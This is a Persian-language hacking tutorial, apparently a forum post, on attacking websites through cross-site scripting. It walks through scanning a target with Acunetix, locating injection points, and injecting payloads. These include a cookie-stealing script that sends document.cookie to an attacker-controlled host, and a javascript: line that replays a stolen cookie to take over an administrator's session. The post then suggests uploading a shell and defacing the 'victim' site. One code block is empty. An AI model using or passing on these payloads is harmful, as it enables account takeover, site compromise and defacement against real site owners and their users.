در این پست براتون آموزش هك سایت با استفاده از بگ Cross site script یا همون xss را میخوام به شكلی كامل بیان كنم.... 
xss:یكی از بگ های خیلی قدرتمند است كه ما را قادر میسازد تا در صفحه سایت كد های مخرب ، كد دزدیدن كوكی و حتی شل خود را تزریق كنیم. 
Acunetix Web Vulnerability Scanner این نرم افزار را نیاز دارید برای پیدا كردن باگ می توانید از سایت دانلود كنید. 

عد از دانلود و نصب برنامه فوق برنامه را باز كنید و قسمت New scan را كه دارای آیكن سفید است كلیك كنید و در قسمت Website URL آدرس سایت مورد نظر خود را بدهید و بالای دكمه Next كلیك كنید در این قسمت باید یك لحظه صبر كنید تا برنامه بشكل اتومات معلومات در موردی سایت را بگیرد و بعد از آن با كلیك كردن بالای Next به مرحله بعد بروید در این قسمت هم تنظیمات را بشكل دلخواه خود انتخاب كنید اگر مبتدا هستید تنظیمات پیشفرض را بگذارید و به مرحله بعدی بروید در این مرحله در قسمت Use this scanning profile گزینه xss را انتخاب كنید و از بین تیك ها تیك گزینه Enable Port Scanning را بردارید و به مرحله بعد بروید در این مرحله هم بدون دستكاری بالای دكمه next كلیك كنید و مرخله بعدی را هم با زدن next بگذرانید حالا برنامه به اسكن كردن سایت شروع میكند اگر سایت این بگ را داشت برای شما نشون میده.. 

مرحله دوم:در این مرحله برای شما نحوه استفاده از بگ را آموزش میدم بعد از اینكه سایت كه بگ xss دارد را پیدا كردید واردی آن سایت شوید بعد از وارد شدن كار های زیر را بكنید: 

1:محل تزریق كد خودتون را پیدا كنید كه معمولا در انجمن ها در قسمت پست جدید میباشد كه باید در انجمن موردی نظر شما گزینه HTML Code is on فعال باشه... اگر سایت شما انجمن نیست باید كد های خود را در كادری search و یا هر كادری دیگر كه قابلیت نوشتن از سمت مشتری Client در آن كادر فعال باشد تزریق كنید اگر با Refresh كردن صفحه كدی شما اجرا نشد از آخرین محل تزریق كد یعنی URL استفاده بكنید كه باید در این قسمت حتما كد شما با Refresh كردن صفحه باید اجرا بشه... 

برای امتحان كردن از اینكه كدی شما اجرا میشود یا نه از این كد استفاده كنید: 
كد php: 
alert(/test/) 

بعد از اینكه كدی شما اجرا شد مرحله بعدی را تعقیب كنید. 

مرحله سوم:در ین مرحله نحوه هك كردن سایت را با استفاد از بگ XSS براتون آموزش میدم شما با دو طریق ذیل میتوانید یك سایت را با استفاده از بگ xss هك كنید: 

1:دزدیدن كوكی:از این روش بیشتر در سایت های كه انجمن هستند استفاده میشود شما با دزدیدن كوكی ادمین سایت واردی اكانتش میشوید و كنترل سایت را بشكل كامل در دست میگیرید برای دزدین كوكی شما به یك كوكی گربر و هاست ضرورت دارید هاست شما باید PHP را پشتیبانی بكند فایل كوكی گربر را كه معمولا یك فایل php است در هاست خود آپلود میكنید و بعد از آپلود آن آدرس كوكی گربری خود را در كدی زیر بجای yourhost.com بنویسید: 
كد php: 
document.location="http://www.yourhost.com/cookie.php?cookie="+document.cookie 

من در این لینك اسمی فایل كوكی گربر را cookie.php گذاشتم شما باید هر نامی كه فایلی كوكی گربر دارد را بنویسید و بعد این كد را در صفحه سایت تزریق كنید كه با استفاده از پست جدید یا New post میتوانید كدی خود را در انجمن ها تزریق كنید اگر میخواهید این كد را از طریق URL تزریق كنید واردی سایت شوید و بجای آدرس سایت كدی زیر را بنویسید: 
كد php: 
javascript:void(document.location="http://www.yourhost.com/cookie.php?cookie="+document.cookie) 

در این كد در عوض yourhost.com آدرس سایت خود را وارد كنید و بعد از آن enter را بزنید خواهید دید كه در هاست شما كوكی های سایت ذخیره میشود .... 
خوب بعد از اینكه كوكی را دزدی كردید حالا وقتی این میرسد كه این كوكی ها را بعوض كوكی خود ذخیره كنید برای این كار شما از دو راه میتوانید استفاده كنید یكی استفاده از ابزاری cookie editor مرورگری فایرفاكس كه میتوانید این ابزار را از سایت فایرفاكس دانلود كنید از بخش Firefox add-ons اما مرورگری opera خودش این ابزار را دارد كه شما بعد از اینكه این ابزار را باز كردید سایت موردی تظری خود را در قسمت فلتر بنویسید و كوكی هایش را تغییر بدهید روشی دوم خیلی ساده است كه تا به حال در هیچ سایتی آموزش هك این روش را كسی نگذاشته است ما در این روش باید اول واردی سایت شویم این روش در تمامی مرورگر ها كارایی دارد و بعد از وارد شدن در سایت مورد نظر كه میخواهید كوكی های خود را تغییر بدهید در كادری آدرس سایت بجای آدرس سایت كدی زیر را بزنید : 

كد php: 
javascript:void(document.cookie="here paste cookie") 


در این كد در قسمت كه here paste cookie نوشته است كوكی را كه دزدی كرده اید بنویسید در اول بخش اول كوكی را بنویسید و enter را بزنید بعد قسمت دوم كوكی را بنویسید و كلیدی enter را بزنید حالا صفحه سایت را refresh كنید خواهید دید كه واردی سایت شده اید با یوزری همین فرد كه كوكی اش را دزدیده اید خوب بعد از این هركاری كه میخواهید بكنید میتوانید در قسمت آپلودی عكس بجای عكس شل آپلود كنید این دیگر مربوط به خلاقیت شماست كه چی كار میكنید... 

2:در این قسمت بجای دزدیدن كوكی كد مخرب خود را مینویسید كه از این روش هكرانی استفاده میكنند كه به برنامه نویسی خاصتا به زبان های php و javascript آشنایی كامل دارند من دو كدی دارم كه كارایی خیلی خوبی دارند وهنگامی كه در سایت تزریق شوند Deface page شما را در سایت آپلود میكنند شما خودتان هم میتوانید با استفاده از خلاقیت خود كد های بنویسید كه كارایی های جالبی داشته باشد . 
كدی اول: 
كد php: 
http://yourdefacepage.com/ 

در این كد بجای deface page آدرس صفحه خود را مینویسید 
بعد از دانلود یك لینك مانند زیر بسازید: 
كد php: 


در این كد بجای yourhost آدرس جای كه این كد را آپلود كرده اید را بنویسید و بعد این كد را در صفحه سایت قربانی تزریق كنید صفحه سایت را refresh كنید خواهید دید كه بجای سایت صفحه دیفیس شما بالا میاید... 
این كد بیشتر در rapidleech كارایی دارد. 

در این قسمت یك كدی دیگر براتون مینویسم كه اگر این كد را در صفحه سایت قربانی تزریق كنید كوكی های شما را كه مربوط همین سایت میشود نشون میده: 
كد php: 
alert(document.cookie)